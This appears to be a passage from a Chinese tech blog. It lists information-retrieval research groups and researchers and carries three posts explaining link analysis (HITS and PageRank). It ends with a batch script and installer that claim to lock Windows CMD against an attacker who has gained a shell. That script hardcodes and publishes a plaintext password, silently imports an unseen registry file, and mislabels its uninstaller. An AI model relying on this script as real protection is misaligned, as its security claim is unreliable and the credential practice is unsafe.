comfortably support collections ranging from a few gigabytes to a few
terabytes of text. The software is distributed under open-source license, and
is used widely in the IR research community.

====================
Standford InfoLab
[infolab.stanford.edu]

The Stanford WebBase Project
[dbpubs.stanford.edu:8091]

The Stanford WebBase project is investigating various issues in crawling,
storage, indexing, and querying of large collections of Web pages. The project
builds on the previous Google activity that was part of the DLI1 initiative.
The DL
I2 WebBase project aims to build the necessary infrastructure to
facilitate the development and testing of new algorithms for clustering,
searching, mining, and classification of Web content.
====================
北大天网组, [sewm.pku.edu.cn]

北京大学网络实验室自1997年开始从事搜索引擎方面的研究与系统开发,
技术积累深厚,综合实力和学术影响在国内一直处于领先地位。我们研发的
“天网”搜索引擎系统是全国最有影响的出自校园的搜索引擎,从1997年10月
开始一直运行至今。“天网”在增量搜索技术、快速检索技术,海量信息存储
技术等方面都具有较强的优势,她的不断发展培育了一批批在海量网络文本
信息处理方面有实战经验的学生,受到中外IT企业的普遍欢迎。
从2001年开始,本研究组在搜索引擎技术的基础上,展开了中国互联网
信息历史的收集与存档工作,形成了“中国互联网信息博物馆”,至今已
收藏20亿在不同时期出现过的中文网页,是目前全国规模最大的历史网页收藏
与回放系统。同时,我们还尝试了在其基础上进行多学科交叉的研究。

====================
中科院大规模内容计算组
[159.226.40.18]

信息检索小组主要针对文本信息的检索开展研究,多次参加TREC会议,
取得了很好的研究成果。小组开发的天罗检索系统在很多国家重要的信息部门
得到了广泛的应用,目前主要的研究方向包括WEB信息的获取,WEB信息检索等。
信息分析小组的研究主要集中在大规模多源异构信息的分析与挖掘方面,
主要包括文本分类与聚类、信息过滤、个性化服务、自然语言问答和浅层
自然语言处理等。小组研制了一系列文本信息加工处理的实验平台,目前实验
平台可以通过主页中“成果演示”进行演示。值得一提的是小组开展的公开源码
计划,其中的高性能分词系统ICTCLAS得到了研究人员的广泛认同与使用。

====================
复旦大学信息检索和自然语言处理组,
[www.cs.fudan.edu.cn]

大规模文本处理主要研究自然语言(特别是中文信息)的处理技术和方法,
包括二个方面内容:首先是基础性工作,主要是基础性的理论和算法, 包括
自动分词、未登录词识别、词性和概念标注、句法分析和语义分析等,也包括
语料库的搜集整理等;其次是中文信息处理的应用技术,包括自动索引、
文本检索、文本摘要、文本分类和文本过滤,特别是上述技术在网络环境下
的应用。这部分工作是文本方向的研究重点。

====================
HIT-IRLab, [ir.hit.edu.cn]

哈工大信息检索研究室 (HIT-IRLab) 成立于 2001 年 3月。研究方向
包括文本检索、问答系统、自动文摘、文本挖掘和语言分析等, 研究室以
语言分析为基础研究,以文本过滤为应用研究,以信息抽取为语言分析从
句子理解向 篇章理解的延伸,以句子检索为在语言分析和篇章理解的支持
下的智能化精准检索技术。

====================
SIGIR(美国计算机学会信息检索特别兴趣小组)、
TREC(文本检索学术年会)
MUC(消息理解学术年会)
TIPSTER(美国国防部高级研究计划署的IR实践基地)

====================
北京大学计算语言学研究所
[icl.pku.edu.cn]

北京大学计算语言学研究所成立于1986年。致力于计算语言学理论、语言
信息处理的基础资源和应用技术三方面的研究。
围绕计算语言学和自然语言处理,包括如下三个主要的方向:首先基础资源
的研究与建设:计算词典学与机器词典,综合型语言知识库,语料库语言学与
语料库加工技术,术语学、术语自动提取、术语标准化研究等。其次是基础理论、
NLP的模型和方法:计算语言学基础,自然语言处理核心技术,现代汉语语法,
汉语的词/句法/语义分析,NLP统计模型,语言处理的信息论方法等。另外是
应用技术:机器翻译的方法、技术与系统实现,信息检索与提取,自然语言
信息处理系统的评价方法和技术,受限汉语及其辅助写作系统,中国古诗词计算机
辅助研究等。

====================
#清华大学智能技术与系统国家重点实验室 (fail to visit the URL)
#[www.csai.tsinghua.edu.cn]

智能技术与系统国家重点实验室依托于清华大学。实验室于1990年2月
对外开放运行。主要从事人工智能基本原理、基本方法的基础与应用基础研究,
包括智能信息处理、机器学习、智能控制,以及神经网络理论等,还从事与
人工智能有关的应用技术与系统集成技术的研究,主要有智能机器人、声音、
图形、图像、文字及语言处理等。

================
Susan Dumais,
[research.microsoft.com]

I am interested in algorithms and interfaces for improved information
retrieval, as well as general issues in and human-computer interaction. I
joined Microsoft Research in July 1997. I work on a wide variety of
information access and management issues, including: personal information
management, web search, question answering, information retrieval, text
categorization, collaborative filtering, interfaces for improved search and
navigation, and user/task modeling.

Prior to coming to Microsoft, I worked on a statistical method for
concept-based retrieval known as Latent Semantic Indexing. You can find
pointers to this work on the Bellcore (now Telcordia) LSI page.

===============
UIUC Information Retrieval Group
[sifaka.cs.uiuc.edu]

The Information Retrieval (IR) group is part of the Database and Information
Systems (DAIS) Lab of the Computer Science Department at University of
Illinois at Urbana-Champaign. We work on a wide spectrum of problems in the
general area of text information management, including retrieval,
organization, filtering , and mining of textual information, aiming at
developing advanced text information management techniques and systems that
help people make better use of text information.

——
ChengXiang Zhai,
[www-faculty.cs.uiuc.edu]

Research Interests: Information Retrieval, Text Mining, Natural Language
Processing, Bioinformatics

University of Illinois at Urbana-Champaign, is recognized for
his work on user-centered, adaptive intelligent information access. His
techniques expect to improve search-engine performance, support better
information organization and enable understanding of large volumes of
information. Zhai’s work in information retrieval is expected to enhance
curricula and provide new educational tools for the growing information
technology workforce.

===============
Stephen Robertson,
[research.microsoft.com]

Stephen Robertson joined Microsoft Research Cambridge in April 1998.

In 1998, he was awarded the Tony Kent STRIX award by the Institute of
Information Scientists. In 2000, he was awarded the Salton Award by ACM SIGIR.
He is a Fellow of Girton College, Cambridge.

At Microsoft, he runs a group called Information Retrieval and Analysis, which
is concerned with core search processes such as term weighting, document
scoring and ranking algor
ithms, and combination of evidence from different
sources. These are studied theoretically through the use of formal models,
mainly statistical, and statistical methods including machine learning
methods, and experimentally, through activities such as the Text Retrieval
Conference (TREC) and with internally generated evaluation sets. The group
(with its Keenbow evaluation environment) has had some excellent results at
TREC. The group works closely with product groups to transfer ideas and
techniques.

His main research interests are in the design and evaluation of retrieval
systems. He is the author, jointly with Karen Sparck Jones, of a probabilistic
theory of information retrieval, which has been moderately influential. A
further development of that model, with Stephen Walker, led to the term
weighting and document ranking function known as Okapi BM25, which is used in
many experimental text retrieval systems.

Prior to joining Microsoft, he was at City University London, where he retains
a part-time position as Professor of Information Systems in the Department of
Information Science (homepage). He was Head of Department for eight years,
during which time it achieved the highest possible rating in two successive
research assessment exercises. He also started the Centre for Interactive
Systems Research, the main research vehicle of which is the Okapi text
retrieval system, which has also done well at TREC.

Before joining City, he was a research fellow at University College London,
where he took his PhD in the School of Library Archive and Information
Studies. Before that he was in the research department at Aslib. He has an MSc
in Information Science from City and a first degree in mathematics from
Cambridge.

===================
Nick Craswell
[research.microsoft.com]

I am an associate researcher at Microsoft Research Cambridge, in the
Information Retrieval and Analysis Group.

Research Overview

I am interested in Web search evaluation, mostly on enterprise-scale webs but
also the World Wide Web. I built the VLC, VLC2, WT2g and .GOV test
collections, which have been made available to research groups around the
world. David Hawking and I coordinated the TREC Web Track experiments. I am
currently involved in the TREC Terabyte Track and Enterprise Track. Some
publications: Book chapter preprint (pdf), IR’01 (citeseer) and CSIRO’01
(pdf).

I also work on effective Web search, which means making use of information in
pages, link structure and URL structure to generate more useful Web search
results. Some papers: SIGIR’05 (pdf), SIGIR’01 (pdf), TOIS’03 (pdf) (copying
is by permission of ACM, Inc.) and ADCS’03 (pdf).

My PhD was in distributed information retrieval (thesis pdf) which means
building a system on top of multiple engines/databases that already exist. My
recent work in the area has considered whether (or when) DIR is really
practical. Some papers: ADC’99 (ps), DL’00 (pdf), ADC’03 (pdf) and ADC’04
(pdf).

===============
Web Search & Data Mining Group of MSR Asia
[research.microsoft.com]

The goal of the Web Search & Data Mining Group of MSR Asia is to drive the
next generation of Web search by leveraging data mining, machine learning, and
knowledge discovery techniques for information analysis, organization,
retrieval, and visualization. In addition, in contrast with current Web search
methods, which essentially do document-level ranking and retrieval, the Web
Search & Data Mining Group has created search at the object level to bring
increased knowledge and intelligence to users.

A Glimpse at Several Core Innovations:

Large-scale Experimental Web Search Platform

The Web Search & Data Mining Group is creating a large scale search platform
to efficiently store, parse, index and search billions of Web pages and other
types of documents. The search platform is flexible enough to allow for
testing of various state-of-the-art search techniques that have been created
at the lab using new technologies.

Structuralizing the Web

The biggest challenge facing both users and search engines over the next
several decades is the continued unstructured growth of the Internet. As such,
search functions that can effectively and efficiently dig out
machine-understandable information and knowledge layers from unorganized and
unstructured Web data will be the key to supporting relevant search results.
To meet this challenge, the group is exploring technologies, namely Web
information extraction, deep Web mining, and Web structure mining that can
automatically classify structures and extract objects from the Web. The
information and knowledge gathered using these new techniques greatly improves
the performance of current Web search and even facilitates the creation of
more sophisticated next generation search technologies.

Vertical Search

Today’s conventional search engines can be described as page-level search
engines whose main function is to rank web pages according to their relevance
to a given query. Driving the future of the search industry are functions that
delve deeper into vertical domains to provide knowledge and intelligence to
query results. At MSR Asia, the Web Search & Data Mining Group is addressing
the greatest challenges faced by vertical search including large scale web
classification, object-level information extraction, object identification and
integration, and object relationship mining and ranking. The results of these
efforts are leading to more advanced search engines that deliver intelligence
and insight to search results.

Mobile Search

The explosive growth of new computing devices such as handheld computers,
Windows Mobile-based PocketPCs, and SmartPhones is driving demand for greater
and more efficient information access. These devices, which leverage the power
of the Web and allow greater access to information than ever before, are still
not capable of performing at the level of a desktop PC. At MSR Asia, the Web
Search & Data Mining Group is inventing new technologies to improve the mobile
search and browsing experience and deliver the capabilities of a PC to users
of these new devices. Project initiatives include developing innovative
presentation schemes and user interfaces to facilitate search and browsing
tasks on mobile devices and developing context aware search technologies to
address the special information needs of mobile users.

Multimedia Search

The Web Search & Data Mining Group is conducting research into new
technologies that index multimedia content such as images, videos, and audio.
Through content analysis and advanced visualization techniques, the group is
transforming today’s conventional text based search engines to include
multimedia content thus delivering more intelligent search results to users.
For example, the group recently developed a new multimedia news reader which
mines large archival news databases presenting text, map information, images,
and background music within a unique user interface providing readers with a
more efficient news search engine and a more enjoyable reading experience.

——
Wei-Ying Ma
[research.microsoft.com]

Senior Researcher, Research Manager, Microsoft Research Asia

Dr. Wei-Ying Ma received the B.S. degree in electrical engineering from the
National Tsing Hua University in Taiwan in 1990, and the M.S. and Ph.D.
degre
es in electrical and computer engineering from the University of
California at Santa Barbara in 1994 and 1997, respectively. From 1994 to 1997
he was engaged in the Alexandria Digital Library (ADL) project in UCSB while
completing his Ph.D. He developed a web-based image retrieval system called
Netra which has been frequently cited by other researchers and is regarded as
one of the most representative image retrieval systems. From 1997 to 2001, he
was with HP Labs where he worked in the field of multimedia adaptation and
distributed media services infrastructure. He joined Microsoft Research Asia
in 2001. Since then, he has been leading a research group to conduct research
in the areas of information retrieval, web search, data mining, mobile
browsing, and multimedia management. He currently serves as an Editor for the
ACM/Springer Multimedia Systems Journal and Associate Editor for ACM
Transactions on Information System (TOIS). He has served on the organizing and
program committees of many international conferences including ACM Multimedia,
ACM SIGIR, ACM CIKM, WWW, ICME, CVPR, SPIE Multimedia Storage and Archiving
Systems, SPIE Multimedia Communication and Networking, etc. He is also the
general co-chair of International Multimedia Modeling (MMM) Conference 2005
and International Conference on Image and Video Retrieval (CIVR) 2005. He has
published 5 book chapters and over 100 international journal and conference
papers.

====================
Google Labs
[labs.google.com]

Google Labs is a playground for Google engineers and adventurous Google users.
Google staffers with wild and crazy ideas post their prototypes on Google Labs
and solicit feedback on how the technology could be used or improved. None of
these experiments are guaranteed to make it onto Google.com, as this is really
the first phase in the development process. Google users with a desire to jump
over the cutting edge are invited to check out any or all of the posted
prototypes and send their comments directly to the Googlers who developed
them. Please, remember to wear your safety goggles while using this site.

Labs.google.com, Google’s technology playground.
Google labs showcases a few of our favorite ideas that aren’t quite ready for
prime time. Your feedback can help us improve them. Please play with these
prototypes and send your comments directly to the Googlers who developed them.

Want to learn more about Google technology? Here are some papers.
[labs.google.com]

Passionate about these topics? You should work at Google.
algorithms, artificial intelligence, compiler optimization,
computer architecture, computer graphics,
data compression, data mining, file system design,
genetic algorithms, information retrieval,
machine learning, natural language processing, operating systems,
profiling, robotics,
text processing, user interface design,
web information retrieval, and more!

[www.google.com]
Google Press Center: The Google Podium
Here you’ll find a selection of public presentations made by Google
executives. From time to time, we will continue to add transcripts, audio or
video clips and links to presentations hosted elsewhere.

====================
Jon Kleinberg
[www.cs.cornell.edu]

Professor of Computer Science, Cornell University

My research is concerned with algorithms that exploit the combinatorial
structure of networks and information. My recent work has included
* link analysis and modeling of the World Wide Web and related information networks;
* discrete optimization and network algorithms; and
* algorithmic approaches to clustering, indexing, and data mining.
====================

收藏与分享
02 2007

[搜索引擎技术普及 - 4] 搜索引擎系统的网络链接结构分析技术(下)

Posted by Yangybcy in 资料

今天,我们来进行链接分析算法的最后一次讲座,今天介绍的PageRank算法是Google公司的Brin等人根据因特网用户浏览模型建立的链接分析算法。

PageRank算法的基本架构和实现思路在实际商用搜索引擎的应用中取得了巨大的成功,并由此得到了研究界的普遍关注,尝试对算法进行性能和效率改进的努力一直到最近也是链接关系分析方面研究的重点之一。

PageRank算法将网络浏览模型作了合乎情理的简化:假设存在这样一名网络浏览者,他从随机挑选的页面开始,按照页面上的链接前进,在每一个页面,浏览者都有可能不再对本页面内部的链接感兴趣,从而随机选择一个新的页面开始新的浏览。

在这种浏览模型下,一个页面被访问到的概率即反映在此页面的Rank值的大小上。如下图所示,页面q1包含指向页面p和m的链接,则它对p和m在Rank值上的贡献各是它自身Rank值的一半。

按此在新窗口浏览图片

形式化的说,在PageRank算法中页面P被访问到的概率依下式给出:

按此在新窗口浏览图片

其中,sigma是有链接指向页面P的网页的集合,而d是页面P的重要性因子,由先验知识得出,反映用户认为这个页面有用的程度。简而言之,就是用户会不会从抛弃这个页面而开始一个新的随机访问过程。算法中,上述计算过程被重复进行直到运算结果收敛为止。而作为计算结果的Rank(P)则被用作页面质量的评价参数。
PageRank算法被作为Google的主要成功经验之一广为推介,但他在学术研究的层次上并没有获得想象之中的比较大的成功。

Nick Craswell与David Hawking发现,即使在链接分析方法使用较多的主页查找任务中,PageRank算法及其变形也仅仅获得了比纯内容检索略好的结果。根据刘悦等的实验,应用PageRank算法的结果在TREC大规模检索数据上“与基准测试数据基本持平” 。Amento等人也利用实验验证了至少在小规模数据上,包括PageRank/HITS在内的各种链接结构分析算法都无法有效的提高纯文本检索的效果。

我们认为,造成PageRank和HITS在内的大量链接分析算法在网络信息检索研究中失效的原因,来自于一般研究所采用数据集合的不完整性。即使现在较为广泛采用的规模较大的.GOV数据库,其规模也不过覆盖不到20G数据,而其链接关系表只涉及了不足150万个链接。对于这样链接结构大量缺失的数据集,仅仅依靠链接结构分析评价页面质量是不可靠的。这也是尽管研究界不断汇报链接分析算法对于提高信息检索系统性能没有帮助,而链接分析模块却一直成为商用搜索引擎不可或缺部分的原因。

然而面临真实的网络环境时,链接分析算法又要面临新的问题,那就是数据的繁杂和垃圾、作弊链接的存在,从这个角度讲,无论在实验或是应用的层面,链接分析算法都是解决诸如页面质量评估这样的网络信息检索发展面临问题的可行途径之一而并非全部。

收藏与分享
02 2007

[搜索引擎技术普及 - 3] 搜索引擎系统的网络链接结构分析技术(中)

Posted by Yangybcy in 资料

这次介绍一下搜索引擎中链接分析的HITS算法

HITS算法是由Kleinberg在90年代末提出的一种链接分析算法,与随后我们将介绍的PageRank等实用性算法不同,HITS算法更大程度上是一种实验性质的尝试。它必须在网络信息检索系统进行面向内容的检索操作之后,基于内容检索的结果页面及其直接相连的页面之间的链接关系进行计算。这使得在实际应用环境中使用HITS算法变得十分困难,尽管有人尝试通过算法改进和专门设立链接结构计算服务器(Connectivity Server)等操作,可以实现一定程度的在线实时计算,但这对于每天要处理超过几十亿次用户需求的商用搜索引擎而言,这样的计算代价仍然是不可接受的。

尽管如此,但HITS算法仍在学术界和产业界都获得了非常多的关注,IBM公司甚至基于改进后的HITS算法开发了专门的检索应用系统Clever系统(尽管此系统并没有投入真实的网络信息检索服务)。这是与HITS算法设计本身所具有的高度的数学严谨性相关的,但更重要的,是因为HITS算法的设计符合网络用户评价网络资源质量的普遍标准,因此能够为用户更好的利用网络信息检索工具访问互联网资源带来便利。

HITS算法对网页进行质量评估的结果反映在它对每个网页给出的两个评价数值——内容权威度(Authority)和链接权威度(Hub)上。

内容权威度与网页自身直接提供内容信息的质量相关,被越多网页所引用的网页,其内容权威度越高;与之相对应的,链接权威度与网页提供的超链接的质量相关,引用越多内容质量高网页的网页,其链接权威度越高。如果我们把一个内容权威度高的网页比作一个味道不错的饭馆的话,那么链接权威度高的网页就是旅游杂志中美食家撰写的一篇推荐饮食地点的文章。

由于网络信息检索所面临的数据对象即万维网数据具有极为繁杂的数据规模,因此,用户所涉及到的绝大多数查询主题都会返回数量繁多的相关查询结果。面对数目动辄上千上万的相关结果集合,绝大多数用户会倾向于查找出结果集合中对自己获取信息最有价值的那一部分网页。HITS算法所解决的正是这一问题:它所施行的数据集合,就是网络信息检索工具返回的与查询主题相关的结果集合,而其输出的结果,就是对此结果集合中网页的内容权威度和链接权威度的评价。HITS算法因而被认为能够极大地改善用户的检索体验,也得到了众多研究人员的关注。

从具体施行步骤而言,HITS算法的施行是一个“迭代—收敛”的过程,由于具体的算法流程比较复杂,我们不准备详细描述其运行过程,只是说明:网页A链接权威度的数值是通过其链向的网页的内容权威度决定的,而网页A的内容权威度的数值则是由链向其的网页的链接权威度所决定的。是不是有点像鸡生蛋与蛋生鸡的关系呢?

HITS算法在特定的应用环境中取得了一定的成功,如在Chakrabarti等基于HITS算法的小规模试验尝试中,研究者获得了超过Yahoo!和AltaVista手工分类结果的检索性能,但其实验数据的规模较小,实验结果测试集合的标注也缺乏足够的客观性。

HITS算法的施行对象及其迭代算法的本质决定了其不可能在网络信息检索系统中取得大规模的应用。而更多的基于实际网络数据的实验结果证明,这个算法本身在挑选内容或链接质量较高的页面时也并非格外有效,究其原因而言,大致包括以下几点:
A. 站点内部网页在权威度数值上的的相互加强;
B. 网页辅助制作工具自动生成的链接条目的干扰;
C. 与主题无关的网页或者主题漂移。

针对上述缺点, Bharat等人对HITS算法进行了相关的修改,具体内容包括忽略站点内部的链接、或者利用网页的内容相似度对Hub/Authority值进行初始化等。这些改进获得了有限的成功,但从算法的核心思想而言与HITS并没有实质的改变,因此在此不再赘述。

收藏与分享
02 2007

[搜索引擎技术普及 - 2] 搜索引擎系统的网络链接结构分析技术(上)

Posted by Yangybcy in 资料

关于搜索引擎技术普及的主题,第二次我们选择来跟大家谈一谈链接结构分析技术。超链接结构信息是网络信息环境与传统信息媒介的最大区别之一,与用户查询需求乃至页面内容均相对独立的超链接结构,是搜索引擎区别于传统信息检索系统的核心所在。

如果说Web信息资源是一部包罗万象的百科全书,那么链接结构信息就是这部百科全书的目录,我们面临的看似无序繁杂的网络信息资源,如果没有链接结构信息作为组织的媒介的话,将很难被用户充分利用。

自从1998年Google将其PageRank算法的一些内容在学术论文中加以公布后,研究界、产业界和搜索引擎技术爱好者对链接分析技术的热忱就没有终止过。在介绍详细的算法流程之前,我们想换一个角度首先对链接分析能够成立的几个基础假设进行一个介绍。

1. 什么是超链接

超链接是指两个网页或网页的两个不同部分之间的一种指向关系,源网页是指包含超链接的网页,超链接一般在源网页HTML源码中表现成如下的文字形式:
<A HREF="http://www.tsinghua.edu.cn/">清华大学主页</A>
目的网页是被超链接所引用的网页。在上述例子中,用户在源网页中可以看见的描述链接的内容被称为“链接文本”(在上述例子中链接文本即为“清华大学主页”),链接文本的特殊颜色和下划线格式表示它是可以被点击的超链接。各种基于超链接结构分析的页面质量评估算法,都是围绕对于链接关系图及链接文本的应用而展开的。

2. 超链接结构分析的基础假设

在2001年SIGIR会议上(美国计算机协会ACM每年召开的关于信息检索方面国际上最权威的研究会议),澳大利亚联邦工学研究组织的Craswell等人对链接结构分析算法的应用方式进行了分析,提出网页超链接结构所具有的以下两个特性(用假设的方式表述)事实上是各种超链接算法得以成立的基础:

如果存在超链接L从页面Psource指向页面Pdestiny,则Psource与Pdestiny满足:

假设1:(内容推荐假设)页面Psource的作者推荐页面Pdestiny的内容,且利用L的链接文本内容对Pdestiny进行描述。

假设2:(主题相关假设)被超链接连接的两个页面Psource与Pdestiny比随机抽取的两个页面有更大的概率有内容相关性。

由假设1可以推知,拥有较高入链接个数的网页得到更高程度的推荐,并应当在页面质量评估中得到较高的评分。在较小规模网页语料库中的实验证明利用这个假设设计的算法能够有效的挑选出高质量网页。因此,在实际网络环境中,为网页增加更多的入链接也成为通过作弊提高网页在搜索引擎中排名的主要方式之一。假设1还指出链接文本的重要特性,即它是对目标页面内容的相对客观的描述,利用这一特性设计的算法被许多研究证明是有效的提高网络信息检索质量的手段。

假设2的正确性被多项研究所证明,它也是某些将内容分析与链接分析相结合的算法如行为扩散算法(spreading activity, SA算法)的理论基础。利用这个假设,检索算法有理由把与相关网页在链接关系上相近的网页同样排认定为比较相关,这也为不少重复/冗余网页判定算法提供了有力的在网页内容分析之外的分析途径。

收藏与分享
24 2007

推荐:加密CMD使电脑溢出也拿不到CMD权限

Posted by Yangybcy in 资料

以下是lock.bat文件


@echo off
title 密码验证
SETLOCAL
set pwd=0
set times=3

echo ________________________________________________________________________________
echo  您现在使用的是[Anlge]的CMD,没有经过[Angle]的允许不能执行任何命令,
echo  您的这次使用的所有操作以及留言都已经记入日志,如果您还没有密码,那请与
echo  [Angle]联系,已经有密码了请您输入密码!
echo ________________________________________________________________________________
echo ####################################################################### >> e:\CMD\mylog.txt
echo  操作: 激活密码验证      时间:%time%    日期:%date% >> e:\CMD\mylog.txt
echo  状态: 等待验证…… >> e:\CMD\mylog.txt
echo. >> e:\CMD\mylog.txt
echo                                 [ LOGIN ]

:password
set /p pwd= 请输入您的密码:
set /A times=%times%-1
if %pwd%==fangzi goto pass
echo ***** 密码验证错误,请您重新输入   您还有 %times% 次机会输入密码 *****
echo .
if %times%==0 goto close
echo  状态: 用户输入密码  验证失败               时间:%time% >> e:\CMD\mylog.txt
goto password

:close
echo  状态: 用户3次输入密码错误  程序锁定        时间:%time% >> e:\CMD\mylog.txt
title 对不起,您无法使用[Angle]的CMD
echo ——————————————————————————–
echo  由于您3次密码验证失败,程序已经被锁定,您已经无法继续操作,您可以选择关闭
echo  本窗口,您也可以通过留言来与[Angle]取得联系,输入留言后,请按回车提交!
echo ——————————————————————————–
echo                                [ MESSAGES ]  

:message
echo ________________________________________________________________________________
set /p msg= 请输入您的留言:
echo . >> e:\CMD\mymsg.txt
echo ####################################################################### >> e:\CMD\mymsg.txt
echo 日期:%date%       时间:%time% >> e:\CMD\mymsg.txt
echo 留言内容: >> e:\CMD\mymsg.txt
echo           %msg% >> e:\CMD\mymsg.txt
echo. >> c:\message.txt
echo     …… OK ……
echo   您的留言已经记录,您可以选择关闭窗口也可以选择继续留言
echo  操作: 用户留言                    时间:%time% >> e:\CMD\mylog.txt
goto message

:pass
echo  状态: 程序已开放,欢迎使用      时间:%time% >> e:\CMD\mylog.txt
title [Angle]的CMD
ENDLOCAL

—————————————————————–

以下是setup.bat

@echo off
copy /y lock.bat %windir%\lock.bat
echo lock.bat安装成功
regedit /s lock.reg
echo lock.reg注册成功
—————————————————–

用来卸装的文件
以下是unlock.reg

@echo off
del /f lock.bat %windir%\lock.bat
echo lock.bat删除成功
regedit /s unlock.reg
echo lock.reg反注册成功

——————————————————

双击setup.bat即可安装!

在使用CMD时,密码为fangzi (全为小写,这里的密码对大小写敏感)
所有的日志存放在E:\CMD\mylog.txt中
所有的留言存放在E:\CMD\mymsg.txt中

收藏与分享
Pages: 上一页 1 2 3 4 5 6 下一页